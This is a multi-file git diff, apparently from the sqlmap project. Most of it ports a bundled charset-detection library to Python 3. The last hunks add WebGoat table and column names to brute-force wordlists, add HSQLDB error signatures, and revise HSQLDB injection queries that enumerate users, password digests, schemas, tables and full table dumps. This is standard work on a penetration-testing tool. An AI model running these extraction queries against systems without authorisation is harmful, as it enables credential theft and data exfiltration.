eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
eError,eError,eError,eError,eError,eError,eError,eError)#c8-cf
UTF8_st = (
eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
9, 11, 8, 7, 6, 5, 4, 3,#08-0f
eError,eError,eError,eError,eError,eError,eError,eError,#10-17
eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
eError,eError, 5, 5, 5, 5,eError,eError,#30-37
eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
eError,eError,eError, 5, 5, 5,eError,eError,#40-47
eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
eError,eError, 7, 7, 7, 7,eError,eError,#50-57
eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
eError,eError,eError,eError, 7, 7,eError,eError,#60-67
eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
eError,eError, 9, 9, 9, 9,eError,eError,#70-77
eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
eError,eError,eError,eError,eError, 9,eError,eError,#80-87
eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
eError,eError, 12, 12, 12, 12,eError,eError,#90-97
eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
eError,eError,eError,eError,eError,eError,eError,eError #c8-cf
)
UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)

View File

@ -14,20 +14,22 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from charsetprober import CharSetProber
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
@ -38,21 +40,26 @@ NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=constants.False, nameProber=None):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
self._mReversed = reversed # TRUE if we need to reverse every pair in the model lookup
self._mNameProber = nameProber # Optional auxiliary prober for name decision
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mLastOrder = 255 # char order of last character
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
self._mFreqChar = 0 # characters that fall in our sampling range
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
@ -67,7 +74,7 @@ class SingleByteCharSetProber(CharSetProber):
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][ord(c)]
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
@ -75,9 +82,12 @@ class SingleByteCharSetProber(CharSetProber):
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
self._mSeqCounters[self._mModel['precedenceMatrix'][(self._mLastOrder * SAMPLE_SIZE) + order]] += 1
else: # reverse the order of the letters in the lookup
self._mSeqCounters[self._mModel['precedenceMatrix'][(order * SAMPLE_SIZE) + self._mLastOrder]] += 1
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
@ -85,11 +95,16 @@ class SingleByteCharSetProber(CharSetProber):
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, we have a winner\n' % (self._mModel['charsetName'], cf))
sys.stderr.write('%s confidence = %s, we have a'
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, below negative shortcut threshhold %s\n' % (self._mModel['charsetName'], cf, NEGATIVE_SHORTCUT_THRESHOLD))
sys.stderr.write('%s confidence = %s, below negative'
'shortcut threshhold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
@ -97,9 +112,8 @@ class SingleByteCharSetProber(CharSetProber):
def get_confidence(self):
r = 0.01
if self._mTotalSeqs > 0:
# print self._mSeqCounters[POSITIVE_CAT], self._mTotalSeqs, self._mModel['mTypicalPositiveRatio']
r = (1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs / self._mModel['mTypicalPositiveRatio']
# print r, self._mFreqChar, self._mTotalChar
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99

View File

@ -14,33 +14,35 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from charsetgroupprober import CharSetGroupProber
from sbcharsetprober import SingleByteCharSetProber
from langcyrillicmodel import Win1251CyrillicModel, Koi8rModel, Latin5CyrillicModel, MacCyrillicModel, Ibm866Model, Ibm855Model
from langgreekmodel import Latin7GreekModel, Win1253GreekModel
from langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
from langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from langthaimodel import TIS620ThaiModel
from langhebrewmodel import Win1255HebrewModel
from hebrewprober import HebrewProber
from .charsetgroupprober import CharSetGroupProber
from .sbcharsetprober import SingleByteCharSetProber
from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel,
Latin5CyrillicModel, MacCyrillicModel,
Ibm866Model, Ibm855Model)
from .langgreekmodel import Latin7GreekModel, Win1253GreekModel
from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from .langthaimodel import TIS620ThaiModel
from .langhebrewmodel import Win1255HebrewModel
from .hebrewprober import HebrewProber
class SBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
self._mProbers = [ \
self._mProbers = [
SingleByteCharSetProber(Win1251CyrillicModel),
SingleByteCharSetProber(Koi8rModel),
SingleByteCharSetProber(Latin5CyrillicModel),
@ -54,11 +56,14 @@ class SBCSGroupProber(CharSetGroupProber):
SingleByteCharSetProber(Latin2HungarianModel),
SingleByteCharSetProber(Win1250HungarianModel),
SingleByteCharSetProber(TIS620ThaiModel),
]
]
hebrewProber = HebrewProber()
logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.False, hebrewProber)
visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.True, hebrewProber)
logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel,
False, hebrewProber)
visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, True,
hebrewProber)
hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber)
self._mProbers.extend([hebrewProber, logicalHebrewProber, visualHebrewProber])
self._mProbers.extend([hebrewProber, logicalHebrewProber,
visualHebrewProber])
self.reset()

View File

@ -13,25 +13,26 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import SJISDistributionAnalysis
from jpcntx import SJISContextAnalysis
from mbcssm import SJISSMModel
import constants, sys
from constants import eStart, eError, eItsMe
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
def __init__(self):
@ -46,35 +47,40 @@ class SJISProber(MultiByteCharSetProber):
self._mContextAnalyzer.reset()
def get_charset_name(self):
return "SHIFT_JIS"
return self._mContextAnalyzer.get_charset_name()
def feed(self, aBuf):
aLen = len(aBuf)
for i in xrange(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == eError:
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n')
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen :], charLen)
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen : i + 3 - charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1 : i + 1], charLen)
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
- charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if self._mContextAnalyzer.got_enough_data() and \
(self.get_confidence() > constants.SHORTCUT_THRESHOLD):
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()

View File

@ -1,20 +0,0 @@
import sys, glob
sys.path.insert(0, '..')
from chardet.universaldetector import UniversalDetector
count = 0
u = UniversalDetector()
for f in glob.glob(sys.argv[1]):
print f.ljust(60),
u.reset()
for line in file(f, 'rb'):
u.feed(line)
if u.done: break
u.close()
result = u.result
if result['encoding']:
print result['encoding'], 'with confidence', result['confidence']
else:
print '******** no result'
count += 1
print count, 'tests'

View File

@ -14,23 +14,25 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from latin1prober import Latin1Prober # windows-1252
from mbcsgroupprober import MBCSGroupProber # multi-byte character sets
from sbcsgroupprober import SBCSGroupProber # single-byte character sets
from escprober import EscCharSetProber # ISO-2122, etc.
from . import constants
import sys
import codecs
from .latin1prober import Latin1Prober # windows-1252
from .mbcsgroupprober import MBCSGroupProber # multi-byte character sets
from .sbcsgroupprober import SBCSGroupProber # single-byte character sets
from .escprober import EscCharSetProber # ISO-2122, etc.
import re
MINIMUM_THRESHOLD = 0.20
@ -38,68 +40,78 @@ ePureAscii = 0
eEscAscii = 1
eHighbyte = 2
class UniversalDetector:
def __init__(self):
self._highBitDetector = re.compile(r'[\x80-\xFF]')
self._escDetector = re.compile(r'(\033|~{)')
self._highBitDetector = re.compile(b'[\x80-\xFF]')
self._escDetector = re.compile(b'(\033|~{)')
self._mEscCharSetProber = None
self._mCharSetProbers = []
self.reset()
def reset(self):
self.result = {'encoding': None, 'confidence': 0.0}
self.done = constants.False
self._mStart = constants.True
self._mGotData = constants.False
self.done = False
self._mStart = True
self._mGotData = False
self._mInputState = ePureAscii
self._mLastChar = ''
self._mLastChar = b''
if self._mEscCharSetProber:
self._mEscCharSetProber.reset()
for prober in self._mCharSetProbers:
prober.reset()
def feed(self, aBuf):
if self.done: return
if self.done:
return
aLen = len(aBuf)
if not aLen: return
if not aLen:
return
if not self._mGotData:
# If the data starts with BOM, we know it is UTF
if aBuf[:3] == '\xEF\xBB\xBF':
if aBuf[:3] == codecs.BOM_UTF8:
# EF BB BF UTF-8 with BOM
self.result = {'encoding': "UTF-8", 'confidence': 1.0}
elif aBuf[:4] == '\xFF\xFE\x00\x00':
self.result = {'encoding': "UTF-8-SIG", 'confidence': 1.0}
elif aBuf[:4] == codecs.BOM_UTF32_LE:
# FF FE 00 00 UTF-32, little-endian BOM
self.result = {'encoding': "UTF-32LE", 'confidence': 1.0}
elif aBuf[:4] == '\x00\x00\xFE\xFF':
elif aBuf[:4] == codecs.BOM_UTF32_BE:
# 00 00 FE FF UTF-32, big-endian BOM
self.result = {'encoding': "UTF-32BE", 'confidence': 1.0}
elif aBuf[:4] == '\xFE\xFF\x00\x00':
elif aBuf[:4] == b'\xFE\xFF\x00\x00':
# FE FF 00 00 UCS-4, unusual octet order BOM (3412)
self.result = {'encoding': "X-ISO-10646-UCS-4-3412", 'confidence': 1.0}
elif aBuf[:4] == '\x00\x00\xFF\xFE':
self.result = {
'encoding': "X-ISO-10646-UCS-4-3412",
'confidence': 1.0
}
elif aBuf[:4] == b'\x00\x00\xFF\xFE':
# 00 00 FF FE UCS-4, unusual octet order BOM (2143)
self.result = {'encoding': "X-ISO-10646-UCS-4-2143", 'confidence': 1.0}
elif aBuf[:2] == '\xFF\xFE':
self.result = {
'encoding': "X-ISO-10646-UCS-4-2143",
'confidence': 1.0
}
elif aBuf[:2] == codecs.BOM_LE:
# FF FE UTF-16, little endian BOM
self.result = {'encoding': "UTF-16LE", 'confidence': 1.0}
elif aBuf[:2] == '\xFE\xFF':
elif aBuf[:2] == codecs.BOM_BE:
# FE FF UTF-16, big endian BOM
self.result = {'encoding': "UTF-16BE", 'confidence': 1.0}
self._mGotData = constants.True
self._mGotData = True
if self.result['encoding'] and (self.result['confidence'] > 0.0):
self.done = constants.True
self.done = True
return
if self._mInputState == ePureAscii:
if self._highBitDetector.search(aBuf):
self._mInputState = eHighbyte
elif (self._mInputState == ePureAscii) and self._escDetector.search(self._mLastChar + aBuf):
elif ((self._mInputState == ePureAscii) and
self._escDetector.search(self._mLastChar + aBuf)):
self._mInputState = eEscAscii
self._mLastChar = aBuf[-1]
self._mLastChar = aBuf[-1:]
if self._mInputState == eEscAscii:
if not self._mEscCharSetProber:
@ -107,24 +119,26 @@ class UniversalDetector:
if self._mEscCharSetProber.feed(aBuf) == constants.eFoundIt:
self.result = {'encoding': self._mEscCharSetProber.get_charset_name(),
'confidence': self._mEscCharSetProber.get_confidence()}
self.done = constants.True
self.done = True
elif self._mInputState == eHighbyte:
if not self._mCharSetProbers:
self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), Latin1Prober()]
self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(),
Latin1Prober()]
for prober in self._mCharSetProbers:
if prober.feed(aBuf) == constants.eFoundIt:
self.result = {'encoding': prober.get_charset_name(),
'confidence': prober.get_confidence()}
self.done = constants.True
self.done = True
break
def close(self):
if self.done: return
if self.done:
return
if not self._mGotData:
if constants._debug:
sys.stderr.write('no data received!\n')
return
self.done = constants.True
self.done = True
if self._mInputState == ePureAscii:
self.result = {'encoding': 'ascii', 'confidence': 1.0}
@ -135,7 +149,8 @@ class UniversalDetector:
maxProberConfidence = 0.0
maxProber = None
for prober in self._mCharSetProbers:
if not prober: continue
if not prober:
continue
proberConfidence = prober.get_confidence()
if proberConfidence > maxProberConfidence:
maxProberConfidence = proberConfidence
@ -148,7 +163,8 @@ class UniversalDetector:
if constants._debug:
sys.stderr.write('no probers hit minimum threshhold\n')
for prober in self._mCharSetProbers[0].mProbers:
if not prober: continue
sys.stderr.write('%s confidence = %s\n' % \
(prober.get_charset_name(), \
if not prober:
continue
sys.stderr.write('%s confidence = %s\n' %
(prober.get_charset_name(),
prober.get_confidence()))

View File

@ -13,26 +13,26 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from constants import eStart, eError, eItsMe
from charsetprober import CharSetProber
from codingstatemachine import CodingStateMachine
from mbcssm import UTF8SMModel
from . import constants
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
@ -50,13 +50,13 @@ class UTF8Prober(CharSetProber):
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == eError:
if codingState == constants.eError:
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1

View File

@ -73,7 +73,7 @@ class MultipartPostHandler(urllib2.BaseHandler):
request.add_data(data)
return request
def multipart_encode(vars, files, boundary = None, buf = None):
def multipart_encode(vars, files, boundary=None, buf=None):
if boundary is None:
boundary = mimetools.choose_boundary()
@ -100,7 +100,7 @@ class MultipartPostHandler(urllib2.BaseHandler):
# buf += 'Content-Length: %s\r\n' % file_size
fd.seek(0)
buf = str(buf)
buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8")
buf += '\r\n%s\r\n' % fd.read()
buf += '--%s--\r\n\r\n' % boundary

View File

@ -2596,3 +2596,7 @@ tmp_lahir
universitas
urut
waktu
# WebGoat
cookie
login_count

View File

@ -3366,3 +3366,6 @@ tuser
tusers
userstbl
usertbl
# WebGoat
user_data

View File

@ -104,6 +104,8 @@
<!-- HSQLDB -->
<dbms value="HSQLDB">
<error regexp="org\.hsqldb\.jdbc"/>
<error regexp="Unexpected end of command in statement \["/>
<error regexp="Unexpected token.*in statement \["/>
</dbms>
</root>

View File

@ -651,8 +651,8 @@
<cast query="CAST(%s AS LONGVARCHAR)"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
<delimiter query=","/>
<limit query="LIMIT %d %d"/>
<delimiter query="||"/>
<limit query="LIMIT %d %d" query2="LIMIT %d OFFSET %d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
@ -675,30 +675,30 @@
<check_udf/>
<users>
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user"/>
</users>
<passwords>
<!-- Passwords only shown in later versions &gt;=2.0 -->
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s' ORDER BY password_digest" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user_name" condition="user_name"/>
</passwords>
<privileges/>
<roles/>
<dbs>
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" />
</dbs>
<tables>
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' ORDER BY table_name" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES ORDER BY table_schem" condition="table_schem"/>
</tables>
<columns>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" query2="SELECT column_type FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" condition="column_name"/>
</columns>
<dump_table>
<blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
</dump_table>
<search_db>